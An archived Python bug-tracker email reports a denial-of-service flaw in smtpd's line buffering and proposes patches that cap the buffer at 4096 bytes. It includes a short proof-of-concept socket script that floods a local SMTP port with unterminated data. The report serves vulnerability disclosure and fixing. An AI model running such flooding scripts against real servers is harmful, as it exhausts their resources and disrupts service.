[ python-Bugs-1745035 ] DoS smtpd vulnerability

Sat, 30 Jun 2007 10:31:16 -0700 

Bugs item #1745035, was opened at 2007-06-28 21:44
Message generated for change (Settings changed) made by loewis
You can respond by visiting: 
https://sourceforge.net/tracker/?func=detail&atid=105470&aid=1745035&group_id=5470

Please note that this message will contain a full copy of the comment thread,
including the initial issue submission, for this request,
not just the latest update.
Category: Python Library
Group: None
Status: Open
Resolution: None
>Priority: 7
Private: No
Submitted By: billiejoex (billiejoex)
Assigned to: Nobody/Anonymous (nobody)
Summary: DoS smtpd vulnerability

Initial Comment:
Method "collect_incoming_data" of "SMTPChannel" class should stop buffering if 
received lines are too long (possible Denial-of-Service attacks).
Without truncating such buffer a simple malicious script sending extremely long 
lines without "\r\n" terminator could easily saturate system resources.

----------------------------------------------------------------------

Comment By: billiejoex (billiejoex)
Date: 2007-06-29 20:00

Message:
Logged In: YES 
user_id=1357589
Originator: YES

Sorry, I realized I've forgotten to reset to zero the bytes counter.
Here's the patch of the patch:

124a125
>         self.__in_buffer_len = 0
135a137,140
>         self.__in_buffer_len += len(data)
>         if self.__in_buffer_len > 4096:
>             self.__line = []
>             self.__in_buffer_len = 0
141a147
>         self.__in_buffer_len = 0


----------------------------------------------------------------------

Comment By: billiejoex (billiejoex)
Date: 2007-06-28 21:45

Message:
Logged In: YES 
user_id=1357589
Originator: YES

--- malicious script

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8025))
while 1:
    s.sendall('x' * 1024)


--- proposed smtpd.py patch

124a125
>         self.__in_buffer_len = 0
135a137,139
>         self.__in_buffer_len += len(data)
>         if self.__in_buffer_len > 4096:
>             self.__line = []



----------------------------------------------------------------------

You can respond by visiting: 
https://sourceforge.net/tracker/?func=detail&atid=105470&aid=1745035&group_id=5470
_______________________________________________
Python-bugs-list mailing list 
Unsubscribe: 
http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

Reply via email to